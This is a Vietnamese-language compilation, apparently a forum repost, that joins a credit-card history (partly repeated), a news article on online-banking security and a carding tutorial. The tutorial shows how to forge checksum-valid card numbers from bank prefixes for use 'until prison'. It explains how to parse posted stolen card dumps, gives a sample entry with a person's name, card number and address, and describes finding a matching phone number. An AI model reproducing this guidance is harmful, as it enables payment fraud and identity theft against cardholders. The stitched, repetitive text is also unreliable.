Năm 1730 ông Christopher Thornton , doanh thương về bàn tủ ( furniture ) đã quảng cáo và đưa ra chương trình mua trả góp đầu tiên trong lịch sử thương mại của loài người . Từ thế kỷ 18th tới đầu thế kỷ 20th . Những người Tallymen bán trang phục cho khách hàng băng cách trả góp hàng tuần. Họ được gọi là Tallymen vì hồ sơ trả tiền của khách đuợc lưu giữ và tính toán trên một miếng gỗ ( wooden stick ) tiền nợ được ghi trên một đầu và tiền trả hàng tuần được khắc trên đầu kia . Chương trình mua trả góp " Buy now, pay later " mãi tới năm 1920 mới được giới thiệu tới Hoa Kỳ, dịch vụ này vẫn còn giới hạn ở từng cửa hàng.
Con người theo sự tiến hoá ,vì nhu cầu tiện ích đòi hỏi đã phát minh ra tiền cắc ( coins ) tiền giấy, ngân phiếu, chi phiếu, và cũng do nhu cầu đòi hỏi nên , khoảng năm 1951 ông Frank X. McNamara ( vị tổ khai sinh ra thẻ tín dụng ) dã thành lập công ty đầu tiên phát hành thẻ tín dụng, 200 chiếc thẻ Credit Card đầu tiên đã cấp cho những người giàu có và có tiếng tăm trong xã hội tại New York và những chiếc thẻ này chỉ được xử dụng hạn chế trong 27 nhà hàng sang trọng ở New York lúc bấy giờ nên có tên gọi là Diners Club Công ty American Express cũng theo gót Diners Club cho ra đời chiếc thẻ American Express , vì sự hạn chế chỉ để xử dụng trong việc ăn uống , du lịch nên loại thẻ này vẫn chưa được phổ biến rộng rãi đến mọi tầng lớp xã hội và chưa được xem như là chiếc thẻ thần kỳ ( the Magic Card ) . Song song với sự ra đời của 2 thẻ này các công ty bán lẻ, xăng dầu cũng cho ra đời một loại thẻ gọi là Charge Card cũng còn giới hạn là laọi này chỉ xài được ở công ty cấp thẻ này thôi . Như thẻ Sears thì chỉ mua hàng ở Sears , Shell thì chỉ đổ xăng ở các cây xăng Shell v.v., . Vậy thì chiếc thẻ thần kỳ đuợc phát minh lúc nào ?.
- Trong thời kỳ Đệ II thế chiến Tất cả các credit card và Charge card đã cấm sử dụng, cho đến sau thế chiến thì mới được phổ biến rộng rãi trở lại . Vì lợi tức mang lại từ thẻ tín dụng khá nhiều nên các ngân hàng bắt đầu nhúng tay vào . Tuy nhiên vẫn còn xử dụng tại địa phương và các cửa hàng bán lẻ . Cho đến năm 1970 , khi mà kỹ thuật điện toán bắt đầu phát triển và hệ thống căn bản cho " The Standards for Magnetic Strip " được hình thành , thì kỹ nghệ Credit card mới thực sự phát triển mạnh mẽ và trở nên một phần của thời kỳ Thông Tin " Information Age "
Chiếc thẻ Thần Kỳ " Revolving Credit Card " lần đầu tiên cấp cho người xử dụng tại tiểu bang California do Bank of America phát hành nên gọi là BankAmericard và nhanh chóng phổ biển rộng rãi khắp tiểu bang . Cái thẻ thần kỳ này đã bắt đầu một bước tiến quan trong cho kỹ nghệ credit card . Thẻ BankAmericard đã cho người xử dụng 1 sự lựa chọn trong việc thanh toán tiền bạc . Họ có thể trả hết 1 lần hoặc trả góp từng tháng ( minimum payment) số tiền thiếu còn lại , ngân hàng sẽ bắt đầu tính tiền lời . Phương pháp này đưọc tiếp dùng cho đến ngày nay .Thẻ này còn thêm một ưu điểm mà ai cũng thích là nếu kẹt tiền , người xử dụng ( cardholder) có thể ra ngân hàng mượn tiền mà không cần phải điền những thủ tục mượn tiền phiền toái ( nhanh, gọn, lẹ ).
Vì sự tiện lợi của thẻ này và nhu cầu đòi hỏi của khách hàng, Bank Card Association được thành hình , vào năm 1965 Bank of America đã cấp giấy phép ( Licensing ) cho những ngân hàng lớn , nhỏ khắp Hoa Kỳ , cho phép những ngân hàng này cấp thẻ BankAmericard cho khách hàng xử dụng ( đương nhiên phải trả tiền cho Bank of America ). Tới năm 1969 hầu hết các thẻ tín dụng do những ngân hàng độc lập cấp đều chuyển qua loại thẻ BankAmericard hoặc MasterCharge Card . Cho nên có thể nói Bank of America là vị tổ khai sinh ra cái thẻ thần kỳ này và lợi tức mang lại từ những chiếc thẻ này đã góp phần không nhỏ đưa Bank of America từ một ngân hàng địa phương ( local bank) thành 1 trong những ngân hàng lớn nhất thế giới .
Thẻ tín dụng cấp phát ngày càng nhiều, công việc xử lý hoá đơn cho từng trương mục ( account)nhiều đến nổi các hệ thống ngân hàng không đảm đương nổi và từ đó dẫn đến sự ra đời của các hội thể tín dụng ( Credit card associations ) như Interlink Association, Western State Bank Card Association, và National BankAmericard Ịnc,. Trong khoảng thời gian này các hoa đơn chưa được điện tử hoá , vẫn còn dùng các loại hoá đơn bằng giấy ( 1 người khách mua hàng hay cash tiền , người thâu ngân phải gọi điện thoại để xin thanh toán hoá đơn (approve charge)sau khi ngân hàng cấp thẻ ( Issue Bank ) đồng ý trả tiền thì sẽ cho người nhận (merchant) 1 số ( authorization number )rồi người nhận lấy 1 hoá đơn ( gồm 3 copy)đặt credit card và hoá đơn này lên một cái máy ( Imprinter) cà qua cà lại ( slide)vài lần để những con số trên thẻ in xuống hoá đơn, sau đó điền số bằng lái, số phone và chữ ký của người chủ thẻ ( cardholder) . 1 bản giao cho người khách, 1 bản deposit vào ngân hàng và 1 bản người nhận giữ .Người Việt chúng ta thường nói đùa mỗi khi trả tiền bằng thẻ là Cà thẻ ( Chi tiết sẽ nói trong bài " Hóws the banking system work ). Chỉ một transaction thôi đã mất nhiều thì giờ mhư vậy, các bạn thử nghĩ mỗi ngày ngân hàng xử lý cả trăm triệu transaction thì mất bao nhiêu thời gian . Đây cũng là dịp để những người " cho tôi ăn ké với" có cơ hội kiếm ăn Credit card fraud ( sẽ nói riêng về phần này )
Như đã nói ở trên, mãi tới năm 1970 sự ra đời của máy điện toán ( IBM computer nó to như cái xe bò)thì kỹ nghệ credit card mới rẻ qua 1 con đường thêng thang rộng mở . Cho phép người nhận thẻ ( retail establishment or merchant) nhận trả bằng thẻ 24 giờ/ 1 ngày và cũng giảm một số lượng giấy tờ đáng kể .
Khoảng giữa thập niên 70 kỹ nghệ credit card mon men tìm kiếm khách hàng trên thị trường quốc tế, nhưng gặp vài trở ngại vì chữ America cho nên BankAmericard đổi thành Visa và Master Charge vì trong 1 vụ kiện đã đổi thành Master Card
Khoảng năm 1979 nhờ sự tiến bộ trong ngành điện tử và điện toán cá nhân ( electronic & PC personal computer ) kỹ nghệ credit card lại tiến thêm 1 bước quan trọng nữa . Sự tiến bộ này đã cho phép người nhận thẻ " chà " swipe thẻ của khách hàng qua máy ( dialup terminal) và mọi thủ tục được điện tử hoá ( electronic processing ) nên đã tiết kiệm được rất nhiều thì giờ và tiền bạc đồng thời cũng nảy sinh ra kỹ nghệ tái chế giấy cũ ( paper recycle )vài người Việt cũng làm giàu nhờ kỹ nghệ tái chế này ( recycling industry )
Bảo mật với Online Banking
TTO - Bắt đầu sử dụng từ những năm 1990, thanh toán trực tuyến (Online Banking) là cốt lõi đối với thương mại điện tử. Tuy vậy việc quản trị và bảo mật tài khoản vẫn không thể ngăn được những thất thoát đáng tiếc, nhất là trong tình trạng tội phạm tài chính Internet đang ngày một nở rộ như hiện nay.
An ninh tài chính mạng vẫn luôn là một thách thức đối với bất kỳ ngân hàng nào.
Có thể ngồi tại Việt Nam, đặt mua một món quà cho người thân đang ở Pháp. Hóa đơn điện nước, điện thoại có thể tự động định kỳ thanh toán. Bạn đặt mua một chiếc đồng hồ Thụy Sĩ trên Internet và chiếc đồng được đem đến tận nhà bạn tại Anh. Hơn 53 triệu người Mỹ đã và đang làm quen dần với hình thức này.
Một hệ thống Online Banking thường bao gồm luôn cả chức năng ngân hàng dành cho người dùng. Khách hàng có thể truy xuất tài khoản để biết thông tin, thực hiện các tác vụ mua bán và chuyển nhượng tài chính. Đơn giản, chỉ cần truy xuất vào tài khoản thông qua Internet, vừa nhanh chóng vừa tiện lợi và chính xác.
Một nghiên cứu kéo dài 18 tháng của Bank of American cũng cho thấy, khách hàng sử dụng dịch vụ trực tuyến có xu thế “trung thành” hơn. Hơn nữa, Online Banking hiện là một dịch vụ miễn phí. Sự tiện dụng, kinh tế chính là ưu điểm của loại hình thanh toán này.
Biểu đồ so sánh tình hình sử dụng các giải pháp an ninh ngân hàng trực tuyến tại châu Âu
Thực trạng an ninh
Những báo cáo gần đây về tình trạng vi phạm, phá rào và lừa gạt để lấy thông tin trong lĩnh vực tài chính làm cho khách hàng e ngại các hoạt động chuyển nhượng tài chính trực tuyến. Các hành động lừa đảo trên Internet dễ thực hiện, ít nguy hiểm và ít tốn kém hơn.
Từ những nghiên cứu mới nhất của Javelin và Pew Report cho thấy, phần lớn các lỗi không phải về phía ngân hàng mà về phía khách hàng. Chỉ tính riêng trong việc bị mất cắp thông tin tài khoản, thì các nguyên nhân ngoại tuyến chiếm 68%, bao gồm cả việc mất ví, sổ tay và thư tín dụng. Tỷ lệ lừa gạt trực tuyến chỉ chiếm có 11,6%.
5% người Mỹ là nạn nhân của các cuộc tấn công tài chính trên mạng, bao gồm cả cá nhân và doanh nghiệp với con số tổn thất khoảng 53 tỷ USD hàng năm.
Thế nhưng, khách hàng có điều kiện theo dõi thường xuyên tài khoản của mình cũng là một cách hay để hạn chế mất tiền. Vì tài khoản được theo dõi thường xuyên hơn, số lượng tiền nếu có bị thất thoát cũng rất ít. Khả năng phát hiện sớm những cuộc đánh cắp sẽ hạn chế số lượng tiền bị thất thoát.
Những khách hàng không sử dụng Online banking có xác suất mất thông tin tài khoản cao hơn vì họ để lại nhiều dấu vết vật lý như sổ tay, hóa đơn chứng từ, tạo điều kiện cho kẻ cắp biết được thông tin tài chính của mình.
Chứng thực đa cấp
Chế độ chứng thực đa cấp đang được xem xét để thay cho chế độ đơn cấp hiện nay, nhằm giải quyết một trong các vấn nạn an ninh tài chính. Ở chế độ đơn cấp, bạn chỉ cần có mật mã là đủ. Điều đó rất dễ dàng bị người khác ăn cắp mà ngay đến bạn cũng không hề biết.
Tuy nhiên, với chế độ đa cấp thì thường mật mã phải được kết hợp với một dạng thông tin "không thể bị đánh cắp", có thể là một câu hỏi mang tính cá nhân kết hợp với câu trả lời... Đây là cách thức được dùng bởi Bank of Americans, với chương trình SiteKey.
Một cách khác là dùng các hệ chìa khóa. Đó có thể là một thiết bị giải mã đặt tại máy tính cá nhân, có chìa khóa và chỉ hoạt động với số PIN của riêng mỗi người. Sẽ dễ dàng hơn cho chủ nhân để phát hiện ra chìa khóa bị mất thay vì một mớ ký tự trong đầu.
Sinh trắc học cũng đang là một trong những giải pháp được hướng đến kết hợp với trong chế độ chứng thực đa cấp. Đây được xem là một trong những giải pháp của tương lai. Hiện cũng có một số công ty đã bắt đầu sản xuất bàn phím sinh trắc học để dành cho các tác vụ chứng thực. Tuy nhiên, giá còn hơi cao.
Giải quyết về chế độ chứng thực chỉ là một trong những giải pháp nhằm tạo một môi trường an toàn hơn cho Online Banking. Không thể có một môi trường nào là tuyệt đối an toàn cả.
Căn bản về Credit Card
Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.
Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó
3xxx xxxx xxxx xxxx: Ameriacan Express Card
4xxx xxxx xxxx xxxx: Visa Card
5xxx xxxx xxxx xxxx: Master Card
6xxx xxxx xxxx xxxx: Discover Card
Chữ số đầu tiên thường được dùng để nhận biết đó là Card của loại nào.
3 = Ame
4 = Visa
5 = Master
6 = Discover
3 chữ số tiếp theo sau là tên nhận dạng ID của ngân hàng.
Nói chung, khi ta nhìn vào 4 ký tự số đầu tiên ta sẽ biết đó là thể loại nào: American Express Card, Visa Card, Master Card hay Discover Card.
AMERICAN EXPRESS
3XXX
3728
3713
3731 - AmEx Green
3737 - AmEx Optima
3782 - AmEx - Small Corporate Card
....
VISA CARD
4XXX
4013 - Citibank
4019 - Bank of America
4024 - Bank of America
4027 - Rockwell Federal Credit Union
4032 - Household Bank
....
MASTER CARD
5XXX
5100 - Western States Bankcard Association
5110 - Universal Travel Voucher
5120 - Western States Bankcard Association
5130 - Eurocard France
....
DISCOVER CARD
6XXX
6013 - MBNA
....
Làm sao để kiểm tra số Card là đúng. Nhờ đâu mà các chương trình kiểm tra Card có thể biết được đó là số đúng của Card.
Câu trả lời đó là tất cả đều phụ thuộc vào con số cuối cùng của Card. Đó là con số mà những chương trình gọi là số tổng kiểm tra (checksum), con số này sẽ quyết định dãy số của Card là số đúng hay sai.
Nếu con số cuối cùng là đúng và phù hợp thì nó là một dãy số Number Card đúng, chúng ta có thể dùng nó.
Nếu số đó là một con số sai thì coi như Number Card đó sai.
Tuy nhiên, nếu chúng ta thông minh và để ý một chút thì ta vẫn có thể tìm được một Number Card đúng sau 9 lần thử khác nhau. Vì ta có thể thay đổi con số cuối cùng thành 1 trong 9 lựa chọn khác:
Ví dụ: 3xxx xxxx xxxx xxx5 : dãy số đúng ta cần tìm.
Ta lần lượt thay con số cuối cùng như sau:
3xxx xxxx xxxx xxx0
3xxx xxxx xxxx xxx1
3xxx xxxx xxxx xxx2
3xxx xxxx xxxx xxx3
3xxx xxxx xxxx xxx4
3xxx xxxx xxxx xxx5 ===> đây là kết quả đúng và con số 5 là số cần tìm.
3xxx xxxx xxxx xxx6
3xxx xxxx xxxx xxx7
3xxx xxxx xxxx xxx8
3xxx xxxx xxxx xxx9
Như vậy tới đây là tạm thời có thể hiểu cách tìm (tính toán) sao cho có một Number Card đúng.
Đây là cách tính thủ công, cách tính “mẹo”. Quá dễ phảI không các bạn.
Như vậy các bạn chỉ cần biết 4 con số đầu tiên để làm “gốc”, 4 con số này để chương trình biết nó là Master Card hay Visa Card … và đó chính là tên của ngân hàng. Sau đó các bạn có thể tự bịa ra 1 dãy số bất kỳ nào đó.
Thay đổi con số “cuối cùng” trong khoảng từ 0..9 để tìm ra con số đúng nhất và như vậy bạn đã có 1 Number Card hợp lệ.
Cách tính toán và tìm ra quy luật của Number Card.
Như đã nói ở trên, chúng ta chỉ cần biết 4 con số đầu tiên mà thôi. Đó là 4 con số quy định tên ID của ngân hàng. Chúng ta chỉ cần biết 4 con số đó là có thể tự tạo ra cho mình một số lượng Number Card dùng thoải mái cho đến ngày vào Prison chơi
Sau đây tôi sẽ cùng các bạn đi tìm cách tính toán một cách khoa học và chính xác hơn chứ không phảI ngồi mò mò, rồi phảI thay đổi con số cuối cho phù hợp.
Ví dụ: 5204 xxxx xxxx xxxY
5204 = Security Pacific : đây là Master Card do ngân hàng Security Pacific phát hành.
xxxx xxxx xxx: là một dãy số ngẫu nhiên, bất kỳ nào đó.
Y : đây là con số cần tìm để Number Card là hợp lệ
Sau khi biết 4 số đầu tiên, ta có thể lấy ngẫu nhiên và bất kỳ từ số 0 đến số 9 của mười một ký tự số đại diện cho chữ X.
Giả sử tôi lấy là
5204 1234 5678 901Y
5204 xxxx xxxx xxxY
Trong đó ta chia ra làm 2 dãy số chẵn và dãy số lẽ.
a. Dãy số 5 0 1 3 5 7 9 1 ta gọi là dãy số lẽ.
b. Dãy số 2 4 2 4 6 8 0 Y ta gọi là dãy số chẫn.
Lấy từng chữ số trong dãy số lẽ “nhân” vớI 2
5 x 2 = 10
0 x 2 = 0
1 x 2 = 2
3 x 2 = 6
5 x 2 = 10
7 x 2 = 14
9 x 2 = 18
1 x 2 = 2
Nếu kết quả nhân của từng số nào lớn hơn 9, thì ta lấy số đó trừ đi 9.
5 x 2 = 10 - 9 = 1
0 x 2 = 0 = 0
1 x 2 = 2 = 2
3 x 2 = 6 = 6
5 x 2 = 10 = 1
7 x 2 = 14 - 9 = 5
9 x 2 = 18 - 9 = 9
1 x 2 = 2 = 2
Cộng các kết quả mớI tình được lai vớI nhau:
1 + 0 + 2 + 6 + 1 + 5 + 9 + 2 = 26 ===èSố A
Cộng các chữ số của dãy số chẵn lại vớI nhau, vì Y là số cần tìm và ta chưa biết nên không cần cộng
Dãy số 2 4 2 4 6 8 0 Y là dãy số chẵn đã nói ở trên
2 + 4 + 2 + 4 + 6 + 8 + 0 = 26 ===è Số B
Lấy A + B
26 + 26 = 52
TớI đây ta lấy số cuối cùng là 2 cộng thêm 8 để làm tròn số thành 10
Ví dụ:
+ số cuối cùng là 3 thì cộng thêm 7 để thành 10
+ số cuối cùng là 4 thì cộng thêm 6 để thành 10
+ số cuối cùng là 5 thì cộng thêm 5 để thành 10
+ số cuối cùng là 6 thì cộng thêm 4 để thành 10
+ số cuối cùng là 7 thì cộng thêm 3 để thành 10
+ số cuối cùng là 8 thì cộng thêm 2 để thành 10
+ số cuối cùng là 9 thì cộng thêm 1 để thành 10
+ số cuối cùng là 0 thì cộng thêm 0 để thành 0 =è chú ý chỗ này
+ số cuối cùng là 1 thì cộng thêm 9 để thành 10
Nói chung là cộng thêm số nào đó để nó thành số chẵn là 10
Vậy cái số bí mật cần tìm chính là con số được cộng thêm vào.
Trong ví dụ này, đó chính là con số 8.
Vậy số Y cần tìm là 8
Số Number Card là 5204 1234 5678 9018
- Việt Nam trong tưong lai thẻ tín dụng cũng sẽ đưọc phổ biến rộng rãi đến mọi tầng lớp xã hội, vì vậy chúng ta cũng nên tìm hiểu thêm về vấn đề này . Vivi sẽ tham khảo từng bước với các bạn về thẻ tín dụng:
Trong một giao dịch bán lẻ truyền thống các vạch từ được đọc bởi thiết bị đầu cuối của điểm mua bán . Mã số kiểm tra giá trị sử dụng của Visa card ( CVV ) hay Mastercard ( CVC ) được mã hoá trong các vạch này có thể được người phát hành thẻ kiểm tra trong thời gian còn hiệu lực sử dụng . Tuy nhiên nếu thẻ không còn giá trị sử dụng thì thẻ CVV hay thẻ CVC không còn hợp lệ nữa . Để giảm hiện tượng lừa đảo trong môi trường sử dụng card không hiện hữu ( card ảo ) những người mua hàng ,nhà buôn và người dùng thẻ sử dụng cvv2 hay cvc2 :
- Vậy Cvv2 Hay Cvc 2 Là Gì :
cvv2 hay cvc2 là mã số bảo mật gồm bộ ba kí tự số được in ở mặt sau card , những số này xuất hiện ở dạng nghiêng ngược ở ngay đầu khung chữ kí và ở cuối ( xem mã u ) . Chương trình này giúp hiệu lực hoá một thẻ đang sử dụng trong giao dịch . Tất cả các thẻ Mastercard , cả thẻ tín dụng lẫn thẻ nợ , được cc yêu cầu là phải có chữ a CVC2 trước ngày 1/1/97 còn tất cả các thẻ VISA phải là 1/1/1001
- CVV2 Hay CVC2 Hoạt Động Như Thế Nào :
Các nhà buôn thẻ ảo được hướng dẫn rằng phải yêu cầu người giữ thẻ xuất trình cvv2 /cvc2 khi người giữ thẻ đặt hàng . Nhà buôn yêu cầu người giữ thẻ đọc mã số này từ thẻ . Sau đó nhà buôn yêu cầu kiểm tra cvv2/cvc2 trong quá trình được sử dụng . Người phát hành thẻ xác định tính hợp lệ của cvv2 hay cvc2 và truyền đi kết quả từ chối hay chấp nhận trong quá trình được quyền sử dụng . Nhà buôn bằng cách sử dụng cvv2/cvc2 cùng với dịch vụ kiểm tra địa chỉ ( AVS) và những phút bàn về quyền sử dụng sau đó có thể thực hiện các quyết Ċ ?ịnh có nhiều thông tin hơn đối với việc chập thuận việc giao dịch đó hay không . . Ngoài ra khi sử dụng cvv2/cvc2 các nhà buôn có thể hi vọng giảm được chi phí trả lại ( chargeback) ít nhất là 26%
-Thay đổi đối với khung chữ kí
Trước đây các số cvv2 hay cvc2 đi theo sau số tài khoản 16 số in ở khung chữ kí của thẻ . Số tài khoản 16 số bây giờ đã bị cắt ngắn còn 4 số trên khung chữ kí . Sự thay đổi này giúp người sử dụng thẻ ký thẻ của họ dễ dàng hơn . Nó cũng giúp nhà buôn dễ dàng hơn khi so sánh chữ kí trên thẻ và chữ kí trên phiếu bán hàng . 19 chữ số ( 16 + 3 ) không còn gây cản trở trong việc kiểm tra chữ kí nữa
- Mã Số Kết Quả Là Gì :
+ Định nghĩa :
M : cvv2 khớp nói chung là bạn muốn thúc đẩy các giao dịch mà bạn đã nhận được chứng nhận thẩm quyền sử dụng ( một cvv2 khớp và một thẻ kiểm tra địa chỉ khớp nếu cần )
N : Cvv2 không khớp có lẽ bạn phải tiếp tục làm việc với người sử dụng thẻ trước khi thực hiện giao dich ngay cả khi bạn đã nhận được một chút chứng nhận thẩm quyền sử dụng . Nếu bạn đã nhận được một chút chứng nhận thẩm quyền sử dụng nhưng bạn nghĩ rằng một giá trị cvv2 không có lẽ đã được gửi đi trước bạn có thể gửi trả lại cvv2 nhưng phải chắc chắn rằng đã sử dụng số tiền $ là 0 cho giao dịch đó để đường tín dụng của khách hàng không bị ảnh hưởng bởi một cvv2 thứ 2 nữa
P : Yêu cầu cvv2 không được thực hiện hoặc ngày hết hạn không được cung cấp , hoặc card không có giá trị cvv2 . Nếu ngày hết hạn để trống hãy nộp lại như là số tiền $ = 0 cho giao dịch đó để đường tín dụng của khách hàng không bị ảnh hưởng bởi một cvv2 thứ 2 nữa
S: Cvv2 có trên card nhưng nhà buôn gửi một mã số nói rằng không có cvv2 . Có lẽ bạn phải làm việc lại tiếp tục với khách hàng để kiểm tra lại rằng khách hàng đã kiểm tra vị trí chính xác đối với số cvv2
U: Người phát hàng không ủng hộ Cvv2
Link Address Verification Service ( AVS )
Atlantic Payment - Dịch vụ kiểm tra địa chỉ : Nếu bạn là nhà buôn dùng thẻ tín dụng , bạn có thể so sánh địa chỉ chi trả của khách hàng USA tại ngân hàng phát hành trước khi hoàn thành một giao dịch mà vạch từ không thể đọc đuợc . Quá trình kiểm tra này yêu cầu cần thiết nếu bạn là nhà buôn dùng thư tín , internet , thư tín hay điện thoại ...
Khi yêu cầu kiểm tra tín dụng thông thường hay uỷ quyền sử dụng bạn phải nhập thông tin địa chỉ chi trả do người sử dụng card cung cấp , khi hệ thống máy tính tiếp xúc với người phát hành và yêu cầu chứng nhận tín dụng , thì thông tin địa chỉ được so sánh vói thông tin trên hồ sơ tại nơi người phát hành . Người phát hành sẽ gửi một mã số phúc đáp với một phúc đáp về thẩm quyền sử dụng tín dụng . Bạn sẽ thực hiện các quyết định kinh doanh sử dụng sau khi xử lý các phúc đáp khác nhau . Tuy nhiên bạn phải luôn nhớ rằng khi một khách hàng cáo buộc rằng họ không hề gửi một đơn đặt hàng bằng mail , điện thoại hay inernet với bạn thì AVS " khớp chính xác " X"hay " Y " sẽ giúp bạn bác bỏ cáo buỊ ?c đó . Và hãy nhớ rằng rất nhiều thiết bị xử lý () sẽ không xử lý các giao dịch mua bán với mã số phúc đáp " N" . Hãy tiến hành một cách thận trọng
Có rất nhiều bạn khi nhìn thấy CC được post lên lại hỏi những câu đại loại như :
- Cái đống trên đây là gì thế , sử dụng như thế nào ?
- Cái Name on Card đâu ... Address ở chỗ nào ?
THÔNG TIN VỀ CARD
Một cái CC hợp lệ phải bao gồm đầy đủ các yếu tố sau :
+ Name on Card hay Card holder : Họ tên chủ thẻ .
+ Billing or Mailing Address : Địa chỉ .
+ City : Thành phố .
+ State : Bang ( của Mẽo và Canada ) .
+ Zip COde ( Post code ) : Mã vùng .
+ Card number : Số thẻ .
+ Card Exp date : ngày hết hạn của thẻ .
và có thể có vài thành phần khác như :
+ Phone number : Số phone ( 11 số ) .
+ Fax Number : Số Fax ( 11 số ) .
hay nhất là khi CC của bạn có cái này :
+CVV2 hay CVN : cái này là mã số bảo mật in trên CC .
KINH NGHIỆM
Không có gì hơn là phải dùng nhiều , nhìn nhiều rồi sẽ quen thôi
-----Sẽ dễ dàng hơn nếu bạn có một vốn tiếng Anh kha khá-----
+ Một đống như sau :
VISA Brett Crow 4300230019306705 11/03 Brett Crow 7 Spruce Street Esko, Minnesota 55733 (XXX)-XXX-XXXX XXX
- Các bạn nhìn cái nào có vẻ là tên người thì nó là Name đấy ( Đừng có cười ! Sự thật đấy ) . Thông thường thì name nằm ở đầu hoặc ngay sau cái Exp date . Như ở đây nó là Brett Crow .
- VISA là nói đây là một cái VISA .
- Một chuỗi 16 con số bắt đầu = 3,4,5 hoặc 6 tùy loại card là CC number . ở đây là 4300230019306705
- Một cụm có cấu tạo theo dạng : AB/CD hay 4 số liên tiếp ABCD là Exp date . thường Exp nằm ở ngay sau CC Number . Ở đây là 11/03 Tức là tháng 11 năm 2003 .
- Sau tên hoặc Exp date sẽ là Address ! Có cấu trúc dạng : [Số] [ Chữ ] ...... thường hay kết thúc = street, driver, Dr, .... thường thôi nhé chứ không phải là tất cả đâu . Đặc biệt có một số địa chỉ có dạng P.O Box [........] đây là hộp thư lưu trú đăng ký ở bưu điện ! Ở đây address là : 7 Spruce Street .
- Zipcode ( Post code ) : Một chuỗi có 5 số ( Mẽo Only ) nhưng nhiều khi lại có ngoại lệ . ở đây zip là 55733 .
- State : Có thể Viết tắt ( 2 chữ cái viết hoa ) hoặc viết full . Dùng nhiều sẽ thuộc State ( Bọn mẽo có bao nhiu bang ý, quên mất roài ) . State thường đứng ngay sau City và đứng ngay trước Zip ! Ở dống này là Minnesota .
- City : không có gì đặc biệt ngoài việc nó đứng sau Address và trước state .
- Phone : Một dãy 11 số có cấu trúc dạng : (XXX)-XXX-XXXX hay XXX-XXXXXXX ...... XXXXXXXXXX . Phone thường đứng sau Zip. Nếu liền cạnh Phone có một dãy cấu trúc tương tự thì đó là số Fax .
- Đống này không có Phone nhưng bạn có thể tìm thấy Phone = 1 cách rất đơn giản : sang một search engine (máy tìm kiếm ) bất kỳ ví dụ như là http://www.google.com/ hay http://www.av.com/ nhập Zip của bạn vào trường search rồi tìm ! Kết quả sẽ là rất nhiều địa chỉ trong đó có số phone thuộc thành phố có Zip code giống bạn ! ! Dễ dàng thế thôi !
- CVV2 : Nếu CC Number của bạn có đầu 4 hay 5 thì CVV sẽ có 3 số . Còn nếu đầu 3 hay 6 thì sẽ có 4 số ! CVV2 nằm ở cuối cùng của đống . ! Ở đây không có Cvv2 thực mình dùng tạm XXX !
1- Thẻ tín dụng là gì ?
2- Có bao nhiêu loại thẻ tín dụng ?
3- Ai có thể xin thẻ tín dụng và làm sao để xin ?
4- Xin thì dễ mà giữ cho tốt mới là khó !
5- Trả không nổi nợ thẻ tín dụng thì sao ?
6- Làm sao để làm tốt lại tín dụng xấu ?
7- Những điều nên biết về credit score
8- Thẻ tín dụng manh laị những lơị ích gì ?
Đây là một tài liệu rất hữu ít cho bất cứ ai đang sống ở bất cứ nơi nào trên thế giới . Vì thẻ tín dụng và tín dụng đang được xử dụng rộng rãi , và trong tương lai sẽ thay thế hẳn tiền mặt
I - Thẻ Tín Dụng Là Gì ?
1 - Lịch sử thẻ tín dụng:
Khoảng hơn 3000 năm trước đây, do nhu cầu trao đổi hàng hoá đòi hỏi và để cho sự buôn bán của các doanh thương thời đó tiện lợi hơn, nên tín dụng đã lần đầu tiên được xử dụng tại Assyria, Babylon và Egypt, mãi tới đầu thế kỷ 14 ngân phiếu tiền trang ( Bill of exchange) và chi phiếu ( forerunner of banknotes, mới được mới được hình thành, các món nợ và thanh toán hoá đơn được giải quyết bằng cách trả trước 1/3 tiền mặt ( coins ) phần còn lại bằng Bill of exchange . Cho đến thế kỷ 17th sự phát minh ra tiền giấy , thì việc mua bán và trao đổi mới dễ dàng hơn nhiều.
Năm 1730 ông Christopher Thornton , doanh thương về bàn tủ ( furniture ) đã quảng cáo và đưa ra chương trình mua trả góp đầu tiên trong lịch sử thương mại của loài người . Từ thế kỷ 18th tới đầu thế kỷ 20th . Những người Tallymen bán trang phục cho khách hàng băng cách trả góp hàng tuần. Họ được gọi là Tallymen vì hồ sơ trả tiền của khách đuợc lưu giữ và tính toán trên một miếng gỗ ( wooden stick ) tiền nợ được ghi trên một đầu và tiền trả hàng tuần được khắc trên đầu kia . Chương trình mua trả góp " Buy now, pay later " mãi tới năm 1920 mới được giới thiệu tới Hoa Kỳ, dịch vụ này vẫn còn giới hạn ở từng cửa hàng.
Con người theo sự tiến hoá ,vì nhu cầu tiện ích đòi hỏi đã phát minh ra tiền cắc ( coins ) tiền giấy, ngân phiếu, chi phiếu, và cũng do nhu cầu đòi hỏi nên , khoảng năm 1951 ông Frank X. McNamara ( vị tổ khai sinh ra thẻ tín dụng ) dã thành lập công ty đầu tiên phát hành thẻ tín dụng, 200 chiếc thẻ Credit Card đầu tiên đã cấp cho những người giàu có và có tiếng tăm trong xã hội tại New York và những chiếc thẻ này chỉ được xử dụng hạn chế trong 27 nhà hàng sang trọng ở New York lúc bấy giờ nên có tên gọi là Diners Club Công ty American Express cũng theo gót Diners Club cho ra đời chiếc thẻ American Express , vì sự hạn chế chỉ để xử dụng trong việc ăn uống , du lịch nên loại thẻ này vẫn chưa được phổ biến rộng rãi đến mọi tầng lớp xã hội và chưa được xem như là chiếc thẻ thần kỳ ( the Magic Card ) . Song song với sự ra đời của 2 thẻ này các công ty bán lẻ, xăng dầu cũng cho ra đời một loại thẻ gọi là Charge Card cũng còn giới hạn là laọi này chỉ xài được ở công ty cấp thẻ này thôi . Như thẻ Sears thì chỉ mua hàng ở Sears , Shell thì chỉ đổ xăng ở các cây xăng Shell v.v., . Vậy thì chiếc thẻ thần kỳ đuợc phát minh lúc nào ?.
- Trong thời kỳ Đệ II thế chiến Tất cả các credit card và Charge card đã cấm sử dụng, cho đến sau thế chiến thì mới được phổ biến rộng rãi trở lại . Vì lợi tức mang lại từ thẻ tín dụng khá nhiều nên các ngân hàng bắt đầu nhúng tay vào . Tuy nhiên vẫn còn xử dụng tại địa phương và các cửa hàng bán lẻ . Cho đến năm 1970 , khi mà kỹ thuật điện toán bắt đầu phát triển và hệ thống căn bản cho " The Standards for Magnetic Strip " được hình thành , thì kỹ nghệ Credit card mới thực sự phát triển mạnh mẽ và trở nên một phần của thời kỳ Thông Tin " Information Age "
